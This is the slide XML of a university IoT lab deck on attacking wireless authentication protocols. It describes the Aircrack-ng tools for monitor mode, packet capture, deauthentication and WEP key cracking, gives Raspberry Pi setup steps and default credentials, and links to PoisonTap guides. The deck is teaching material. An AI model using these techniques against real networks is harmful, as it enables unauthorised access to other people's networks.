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257" r:id="rId3"/>
    <p:sldId id="515" r:id="rId4"/>
    <p:sldId id="338" r:id="rId5"/>
    <p:sldId id="698" r:id="rId6"/>
    <p:sldId id="720" r:id="rId7"/>
    <p:sldId id="699" r:id="rId8"/>
    <p:sldId id="701" r:id="rId9"/>
    <p:sldId id="705" r:id="rId10"/>
    <p:sldId id="704" r:id="rId11"/>
    <p:sldId id="694" r:id="rId12"/>
    <p:sldId id="695" r:id="rId13"/>
    <p:sldId id="696" r:id="rId14"/>
    <p:sldId id="697" r:id="rId15"/>
    <p:sldId id="700" r:id="rId16"/>
    <p:sldId id="707" r:id="rId17"/>
    <p:sldId id="703" r:id="rId18"/>
    <p:sldId id="709" r:id="rId19"/>
    <p:sldId id="702" r:id="rId20"/>
    <p:sldId id="706" r:id="rId21"/>
    <p:sldId id="708" r:id="rId22"/>
    <p:sldId id="722" r:id="rId23"/>
    <p:sldId id="710" r:id="rId24"/>
    <p:sldId id="711" r:id="rId25"/>
    <p:sldId id="712" r:id="rId26"/>
    <p:sldId id="713" r:id="rId27"/>
    <p:sldId id="714" r:id="rId28"/>
    <p:sldId id="715" r:id="rId29"/>
    <p:sldId id="716" r:id="rId30"/>
    <p:sldId id="718" r:id="rId31"/>
    <p:sldId id="719" r:id="rId32"/>
    <p:sldId id="721" r:id="rId33"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="9820275" cy="66563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7384" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="159" d="100"/>
          <a:sy n="159" d="100"/>
        </p:scale>
        <p:origin x="174" y="14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56088" cy="333375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62600" y="1"/>
            <a:ext cx="4256088" cy="333375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B0C2B82B-3CB3-45A5-AD82-FFDB05CA744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498475"/>
            <a:ext cx="4438650" cy="2497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2663" y="3162301"/>
            <a:ext cx="7854950" cy="2995613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23014"/>
            <a:ext cx="4256088" cy="331787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62600" y="6323014"/>
            <a:ext cx="4256088" cy="331787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4550A6EE-218C-4898-BCDA-C343B527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42556-4641-4443-A346-91ED3D1D690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13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DBB05-52B1-4BDE-B723-AAB1BCD6BA2D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895E1-61F9-47D1-9A49-7F61036CBB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AD42-907E-4451-8A58-22662EDC5CE8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8668-3887-4BA0-81DE-09315BAD3A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20200" y="549275"/>
            <a:ext cx="2719917" cy="55832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0451" y="549275"/>
            <a:ext cx="7956549" cy="55832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D24A-3A8B-49B6-ABE7-3669F31A1773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8EB2-36B3-4C0F-A829-F7DE4B514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8018" y="549275"/>
            <a:ext cx="10390716" cy="6238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60452" y="1557338"/>
            <a:ext cx="5338233" cy="4575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01885" y="1557338"/>
            <a:ext cx="5338233" cy="4575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284D-F71B-467B-960E-4F48D18E739F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761E-444D-4546-869E-0B5F71F5EB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07754-58B6-4F12-994E-03C0C912748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DAD0-6BE9-44CA-9159-90BD9341387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0855-7679-4AC6-9BE6-43499C58A18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0452" y="1557338"/>
            <a:ext cx="5338233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01885" y="1557338"/>
            <a:ext cx="5338233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D9D2-231D-4874-B7E2-F34BFDFFE1D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39FD-AE09-4E03-8B80-A657AA2137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E2AB-7BFF-4469-BF55-FDE71885852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30EC-345E-4123-B5C2-446E7BDD2A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FD7E-3A40-44DA-B969-25A33BFC0AE9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D64B-48A0-4611-8556-B1CF162EFA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1577-0130-41E9-BCE5-D52B506D7EC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52B8-6F2F-40EA-9FD4-C634DEE6B9A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435E-6649-4C17-A401-95CBE334D2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20200" y="549275"/>
            <a:ext cx="2719917" cy="55832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0451" y="549275"/>
            <a:ext cx="7956549" cy="55832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7984-7A70-482E-B8AF-DD572B9834B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741F9-0630-4C5B-AEC6-92A8A6CF0BE3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F9F1-5997-4E05-A753-78C7BDD0F3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0452" y="1557338"/>
            <a:ext cx="5338233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01885" y="1557338"/>
            <a:ext cx="5338233" cy="457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1566-671C-4241-BDE1-BFE17C217A72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3965-A367-47A7-A0E9-168E590969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71F62-96CE-43A0-A8F8-5579CB0B9EB4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B91F-0C1B-45CC-AC43-EF3241FF88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E23D-D3CA-4AB9-8DAB-5543E10CF4AA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02F2-17A2-459B-84E9-2572A42A6D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6E67-A830-48FC-B458-9B1F3236D238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401A-0F2F-4A01-A734-62F2377833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6351-92BA-41B1-8B91-02287F6E855F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7064-59F2-4B4B-B911-0C19720EE3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F093-2776-4D6B-B01D-370BAADA70BD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4396-3C2F-4B14-BB0E-3FB513B9A7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8018" y="549275"/>
            <a:ext cx="10390716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1" y="1557338"/>
            <a:ext cx="10879667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fld id="{10987EB0-2C6C-491A-8A38-88EA5E9F876D}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2022/5/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" alt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fld id="{A29BA697-9BA2-46A8-9E2B-92EBAD8744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143934" y="6308725"/>
            <a:ext cx="407881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900" i="1">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>高速網路實驗室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9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H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="900" i="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>igh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="9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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="900" i="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>peed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="9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N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="900" i="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>etwork </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="9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G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="900" i="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>roup Lab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10896601" y="6453189"/>
            <a:ext cx="96096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CFD2C3DA-ED7C-4285-931E-8F9E29B5659C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1000">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120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TW" sz="1000" dirty="0"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C9EBA8B-B6BD-4499-ACE9-A3580B7D21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9377" y="794686"/>
            <a:ext cx="11233248" cy="762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FF33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334434" y="3068639"/>
            <a:ext cx="11258551" cy="744537"/>
            <a:chOff x="158" y="891"/>
            <a:chExt cx="5319" cy="469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gray">
            <a:xfrm>
              <a:off x="295" y="1117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ahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2059" name="Picture 9" descr="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8" y="891"/>
              <a:ext cx="491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75885" y="6165851"/>
            <a:ext cx="854498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1200" i="1">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>高速網路實驗室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12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H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" i="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>igh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="12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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" i="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>peed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="12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N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" i="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>etwork </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" i="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>roup Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 11" descr="校徽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3084" y="6026150"/>
            <a:ext cx="115146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8018" y="549275"/>
            <a:ext cx="10390716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1" y="1557338"/>
            <a:ext cx="10879667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bg2"/>
                </a:solidFill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bg2"/>
                </a:solidFill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bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F4DB3A33-8277-4803-AE2E-EBD7005EBC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FF33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odejs.org/en/downloa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211.22.104.1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YDa_VDbjPY" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/qq_28208251/article/details/48115815" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.security-sleuth.com/sleuth-blog/2017/3/6/installing-poison-tap-for-dummies-the-most-complete-guide" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ubuntu-tw.org/modules/newbb/viewtopic.php?topic_id=1059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amyk/poisontap" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aircrack-ng.org/doku.php?id=airmon-ng#error_adding_monitor_mode_interfacecommand_failedoperation_not_supported_-95" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.86duino.com/?p=15623&amp;lang=T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odclouddownloadprod.blob.core.windows.net/shared/mod-rndis-driver-windows.zi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2360F-B44B-414A-AC03-83CF8DBA5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386" y="1689472"/>
            <a:ext cx="9521228" cy="2387600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4800" dirty="0"/>
              <a:t>物聯網核心技術</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>實驗四</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>物聯網與無線網路認證協定之攻擊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2215963-792A-441F-9C46-82AF8E93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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>國立中正大學資訊工程系 黃仁竑教授</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>助教 莊諺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360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90678-3EA1-447C-AD40-FA0E68BA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目標一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>協定密碼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5AC839F-D068-4F04-AF59-32118CF01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173264"/>
            <a:ext cx="2084548" cy="208454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481AC62-DF0A-4A72-98B3-079DFC7B8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16" y="3759497"/>
            <a:ext cx="1001965" cy="82753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F585BA8-0AC8-4764-A700-D12D2A2D6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706194"/>
            <a:ext cx="1934039" cy="1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79FE6D-B5DE-473C-B07E-5F3174A0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F2FDD9-4699-4F28-A8D8-63064D17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W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ncryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>rotocol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b="1" dirty="0"/>
              <a:t>WEP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IEEE 802.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>標準</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(1999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>年通過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RC4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IEEE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>802.11i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中被淘汰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(2004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13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CB38D-ECAD-4A42-AB7B-D96B50DB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856C4D7-9AC9-46D6-A69C-567524E13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527" y="1412776"/>
            <a:ext cx="5796946" cy="50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2754E-C1E0-441D-9651-37E10103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工具說明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C58340-6DCD-4FA3-9A86-8A923CD3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ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：啟動及查看網卡狀態。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>iwconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看無線網卡的狀態及作用模式。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>-ng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：將無線網卡啟用在監聽模式。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>-ng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：擷取往來的封包。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>-ng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：利用阻斷方式讓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>重新尋求連線。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>-ng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：利用擷取的封檔進行破解。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33974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73CB1-8F4B-4ED6-8497-676E880D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Headless installation (USB)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EAD0D-0554-4097-AE4F-A9C1536F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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>/boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>空白檔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>新增新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>wpa_supplicant.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，建議以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>nodepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>編輯</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>cmdline.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>rootwait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>後增加 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>modules-load=dwc2,g_ether</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>config.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>增加 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>dtoverlay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>=dwc2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>raspberry pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>進入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>預設帳號：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>pi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>預設密碼：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>raspberry</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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626CF1-BC5C-475C-80B8-47FAED9F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15" y="3547777"/>
            <a:ext cx="3400900" cy="8859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BA1ADD0-4339-44C7-9289-15FF53684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78" y="2849256"/>
            <a:ext cx="3743847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6DF956-61F5-424E-B3A0-8DB52CF1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Raspberry pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>初始設定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526D2E-0FE9-4C89-B25C-2EA10A3F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err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> apt-get update </a:t>
            </a:r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apt-get upgrade -y </a:t>
            </a:r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apt-get remove -y vim-common </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> apt-get install -y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>-ng vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>tmux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4171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C8C1F-C939-49D9-8FFF-5481D16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en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>usb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> interface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A6320-8E53-4814-ADBD-194B94E4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err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> vim 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/network/interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>新增</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>allow-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>hotplug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> usb0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> usb0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>inet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> static 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sz="2000" dirty="0"/>
              <a:t>address 192.168.7.2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>	netmask 255.255.255.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>	network 192.168.7.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>	broadcast 192.168.7.255 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>	gateway 192.168.7.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720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err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
